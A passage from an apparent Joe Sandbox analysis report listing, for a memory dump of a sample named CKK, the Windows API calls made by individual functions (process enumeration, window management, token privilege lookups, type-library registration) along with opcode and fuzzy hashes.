                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                              • String ID:
                                                                                              • API String ID: 2759813231-0
                                                                                              • Opcode ID: 6f5d653d3bcab71625971b1f5de2cf48ff1842024e103d75f930dbd892aa2df6
                                                                                              • Instruction ID: d44c14da9561e5973a61129c0a93b6c591a6b9789223b979d7acce3f6663e80b
                                                                                              • Opcode Fuzzy Hash: 6f5d653d3bcab71625971b1f5de2cf48ff1842024e103d75f930dbd892aa2df6
                                                                                              • Instruction Fuzzy Hash: 2F313075D00249AFCB00EFA9C981DAEBBFDEF88314B5480A9E515E7211DA319E45CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00A5D501
                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00A5D50F
                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00A5D52F
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A5D5DC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                              • String ID:
                                                                                              • API String ID: 420147892-0
                                                                                              • Opcode ID: dfb9589de869ffccc94116879e097414602c2c2b41b58f6d506a714857078d2a
                                                                                              • Instruction ID: d282a12f1d7765496d665227d151dfe14f9e91d6b756bd8b66b1e67fdfbfa17a
                                                                                              • Opcode Fuzzy Hash: dfb9589de869ffccc94116879e097414602c2c2b41b58f6d506a714857078d2a
                                                                                              • Instruction Fuzzy Hash: A0318F711083049FD310EF54C885BBFBBE8EFD9394F14092DF685861A1EB719A49CBA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A09BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A09BB2
                                                                                              • GetCursorPos.USER32(?), ref: 00A89001
                                                                                              • TrackPopupMenuEx.USER32 ref: 00A89016
                                                                                              • GetCursorPos.USER32(?), ref: 00A8905E
                                                                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00A47711,?,?,?), ref: 00A89094
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2864067406-0
                                                                                              • Opcode ID: 9de88bd49b1e5a5e11649915931007b9eae27553a21996dfae95d70bc02c4c96
                                                                                              • Instruction ID: 6c5261b2ba7512dd4cb3bdb4855507404890f8e2f0f28b6f8441ae985553341f
                                                                                              • Opcode Fuzzy Hash: 9de88bd49b1e5a5e11649915931007b9eae27553a21996dfae95d70bc02c4c96
                                                                                              • Instruction Fuzzy Hash: A1219F35600018EFCB25DF94CC58EFB7BB9EB4A360F184065F906572A2C3359961DB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNEL32(?,00A8CB68), ref: 00A5D2FB
                                                                                              • GetLastError.KERNEL32 ref: 00A5D30A
                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00A5D319
                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00A8CB68), ref: 00A5D376
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                              • String ID:
                                                                                              • API String ID: 2267087916-0
                                                                                              • Opcode ID: fd9c0aca0e639be5cdf7604da6f6bd85eb050e524db2d54437f45b8b1e073a7c
                                                                                              • Instruction ID: 6945afc2a6fca505b4a7c3488e62f2a22bd146a7cba09964dcba0395373604be
                                                                                              • Opcode Fuzzy Hash: fd9c0aca0e639be5cdf7604da6f6bd85eb050e524db2d54437f45b8b1e073a7c
                                                                                              • Instruction Fuzzy Hash: E72191705052019FC720EF64C8819AAB7E4FF95375F104A1DF899DB2A1E730D94ACB93
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A51014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00A5102A
                                                                                                • Part of subcall function 00A51014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00A51036
                                                                                                • Part of subcall function 00A51014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A51045
                                                                                                • Part of subcall function 00A51014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00A5104C
                                                                                                • Part of subcall function 00A51014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A51062
                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00A515BE
                                                                                              • _memcmp.LIBVCRUNTIME ref: 00A515E1
                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A51617
                                                                                              • HeapFree.KERNEL32(00000000), ref: 00A5161E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                              • String ID:
                                                                                              • API String ID: 1592001646-0
                                                                                              • Opcode ID: e44690c546bb9252c69016aa635624c495e8f30014506cf91f9f52df777c347a
                                                                                              • Instruction ID: 01a0ec7d92379ce04ec5a4755e3666d7e5a14f1546065b6ce0a527eb0cf2dc28
                                                                                              • Opcode Fuzzy Hash: e44690c546bb9252c69016aa635624c495e8f30014506cf91f9f52df777c347a
                                                                                              • Instruction Fuzzy Hash: 8A214871E40109AFDB10DFA4C989BFEB7B8FF44356F184459E851AB241E734AA49CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00A8280A
                                                                                              • SetWindowLongW.USER32 ref: 00A82824
                                                                                              • SetWindowLongW.USER32 ref: 00A82832
                                                                                              • SetLayeredWindowAttributes.USER32 ref: 00A82840
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Long$AttributesLayered
                                                                                              • String ID:
                                                                                              • API String ID: 2169480361-0
                                                                                              • Opcode ID: c5b599ebde21c2d1572fd433537d2fbcef4f374b0d874dc7aa19531ac3c15617
                                                                                              • Instruction ID: 6761f9d947a6d3f2ec06b789e077ecc31959f06ee94cf76073acb97b32a9a902
                                                                                              • Opcode Fuzzy Hash: c5b599ebde21c2d1572fd433537d2fbcef4f374b0d874dc7aa19531ac3c15617
                                                                                              • Instruction Fuzzy Hash: 1E21D335604115AFDB14EB24C844FBABBA5EF85324F148158F4268B6E2C775FC42CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A58D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00A5790A,?,000000FF,?,00A58754,00000000,?,0000001C,?,?), ref: 00A58D8C
                                                                                                • Part of subcall function 00A58D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00A58DB2
                                                                                                • Part of subcall function 00A58D7D: lstrcmpiW.KERNEL32(00000000,?,00A5790A,?,000000FF,?,00A58754,00000000,?,0000001C,?,?), ref: 00A58DE3
                                                                                              • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00A58754,00000000,?,0000001C,?,?,00000000), ref: 00A57923
                                                                                              • lstrcpyW.KERNEL32(00000000,?), ref: 00A57949
                                                                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,00A58754,00000000,?,0000001C,?,?,00000000), ref: 00A57984
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrcmpilstrcpylstrlen
                                                                                              • String ID: cdecl
                                                                                              • API String ID: 4031866154-3896280584
                                                                                              • Opcode ID: 87f7ded92076b9373daa441a999d5183ccc5281cf31bb84b133d7a99504aa745
                                                                                              • Instruction ID: b5b8e6efb72ba538686988ad14ce9d3da1ad56e73bb4cfdef6fe305d2cc74341
                                                                                              • Opcode Fuzzy Hash: 87f7ded92076b9373daa441a999d5183ccc5281cf31bb84b133d7a99504aa745
                                                                                              • Instruction Fuzzy Hash: F211033A200242AFCB259F35E844E7A77A9FF85351B00402AFC06DB2A5EB319805C7A1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00A87D0B
                                                                                              • SetWindowLongW.USER32 ref: 00A87D2A
                                                                                              • SetWindowLongW.USER32 ref: 00A87D42
                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00A87D6B
                                                                                                • Part of subcall function 00A09BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A09BB2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Long
                                                                                              • String ID:
                                                                                              • API String ID: 847901565-0
                                                                                              • Opcode ID: 825100b02a847e0d11ded0f6590bfb954172e25dae9df4a37910a8fddf660a98
                                                                                              • Instruction ID: 8025157ce62c677671465657b23a0cd02ca117acc0cb14f2b3dff63993c743a6
                                                                                              • Opcode Fuzzy Hash: 825100b02a847e0d11ded0f6590bfb954172e25dae9df4a37910a8fddf660a98
                                                                                              • Instruction Fuzzy Hash: 68115E32605615AFCB10AF68DC04EAA3BA5AF463B0B254724F835D72E1E730D951DF50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00001060,?,00000004), ref: 00A856BB
                                                                                              • _wcslen.LIBCMT ref: 00A856CD
                                                                                              • _wcslen.LIBCMT ref: 00A856D8
                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00A85816
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 455545452-0
                                                                                              • Opcode ID: d61cb7f41488fb0b66e0c7ae9e313b7dcafecf3ae958c63fb458d71a41ba283d
                                                                                              • Instruction ID: 17d70d4020bcf6dbc765b68dca5d64ffdc889198fe24a9e3687f7a486b0d0eee
                                                                                              • Opcode Fuzzy Hash: d61cb7f41488fb0b66e0c7ae9e313b7dcafecf3ae958c63fb458d71a41ba283d
                                                                                              • Instruction Fuzzy Hash: B111BE75E00608A6DF20EFB58C85AEE77BCAF11760B10803AFD15D6081EB74CA84CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00A51A47
                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A51A59
                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A51A6F
                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A51A8A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: d8bf6e25226a03d28060d09551f2e8608b22087ce59ed57490d342ca27abf351
                                                                                              • Instruction ID: 426ff03e0a4970988d3f9790bea2b73ecf2930f1bc87cd45dda159623cc3f0c0
                                                                                              • Opcode Fuzzy Hash: d8bf6e25226a03d28060d09551f2e8608b22087ce59ed57490d342ca27abf351
                                                                                              • Instruction Fuzzy Hash: A711097AD01219FFEB11DBA5CD85FADBB78FB08750F2000A1EA04B7290D6716E51DB94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00A5E1FD
                                                                                              • MessageBoxW.USER32 ref: 00A5E230
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00A5E246
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A5E24D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                              • String ID:
                                                                                              • API String ID: 2880819207-0
                                                                                              • Opcode ID: 8029a91c5503a6b559167b74817bda859d11eb1efc2c221e4c7a7d623f6a3195
                                                                                              • Instruction ID: c7a5f38ab9eb9445989e62ba76ebee53f92cbae87169b3c7f34898d0105d3c13
                                                                                              • Opcode Fuzzy Hash: 8029a91c5503a6b559167b74817bda859d11eb1efc2c221e4c7a7d623f6a3195
                                                                                              • Instruction Fuzzy Hash: 6011C476A04254BBCB05DFE8AC09EDE7FACEB46325F044255F924E7391D6B08A058BB0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateThread.KERNEL32(00000000,?,00A1CFF9,00000000,00000004,00000000), ref: 00A1D218
                                                                                              • GetLastError.KERNEL32 ref: 00A1D224
                                                                                              • __dosmaperr.LIBCMT ref: 00A1D22B
                                                                                              • ResumeThread.KERNEL32(00000000), ref: 00A1D249
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                              • String ID:
                                                                                              • API String ID: 173952441-0
                                                                                              • Opcode ID: 53b72a4df8febd46889dd217a148bb18d024090ec55c415b7677172f81d87253
                                                                                              • Instruction ID: af9caa2ce25733b504c83ba4a195cefd0f764c0802f449eeea4a78f334454975
                                                                                              • Opcode Fuzzy Hash: 53b72a4df8febd46889dd217a148bb18d024090ec55c415b7677172f81d87253
                                                                                              • Instruction Fuzzy Hash: 3301F536805214BBDB119BA5DC09BEE7B6DEF81730F200319F935961D0DB71C982C7A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateWindowExW.USER32 ref: 009F604C
                                                                                              • GetStockObject.GDI32(00000011), ref: 009F6060
                                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 009F606A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateMessageObjectSendStockWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3970641297-0
                                                                                              • Opcode ID: 1b07bdd94db8d5b285cf0548a2d314f1de16e1635d9b4bd13b319d713b6327c8
                                                                                              • Instruction ID: 37b2c896a352812838c18a313766e8aedce92ef5cb4846943fcae18a4db319af
                                                                                              • Opcode Fuzzy Hash: 1b07bdd94db8d5b285cf0548a2d314f1de16e1635d9b4bd13b319d713b6327c8
                                                                                              • Instruction Fuzzy Hash: A2115B7250160CBFEF128FA59C44EFABB6DEF093A4F180216FA1552110DB369C619FA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 00A13B56
                                                                                                • Part of subcall function 00A13AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00A13AD2
                                                                                                • Part of subcall function 00A13AA3: ___AdjustPointer.LIBCMT ref: 00A13AED
                                                                                              • _UnwindNestedFrames.LIBCMT ref: 00A13B6B
                                                                                              • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00A13B7C
                                                                                              • CallCatchBlock.LIBVCRUNTIME ref: 00A13BA4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                              • String ID:
                                                                                              • API String ID: 737400349-0
                                                                                              • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                              • Instruction ID: 837e91db74820eeb94c56456b2516b161f6cfe031717a1a971ae67978f221410
                                                                                              • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                              • Instruction Fuzzy Hash: 2E01E973100149BBDF126F99CD46EEB7B6AEF5C754F044014FE4856121D732E9A1DBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00A5747F
                                                                                              • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00A57497
                                                                                              • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00A574AC
                                                                                              • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00A574CA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Type$Register$FileLoadModuleNameUser
                                                                                              • String ID:
                                                                                              • API String ID: 1352324309-0
                                                                                              • Opcode ID: 247001e1a2db32618efde2d883abcfe1aa95b51596f6bc59e138ecf862db5202
                                                                                              • Instruction ID: 2be37937984a220421be0e43996e44dc7cbe49e1362a28f9f9296ad0ee4ca0a1
                                                                                              • Opcode Fuzzy Hash: 247001e1a2db32618efde2d883abcfe1aa95b51596f6bc59e138ecf862db5202
                                                                                              • Instruction Fuzzy Hash: 33118BB5205310ABE720CF68EC08F9A7BFCFB00B11F108569AA16E6191D7B0E948DF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
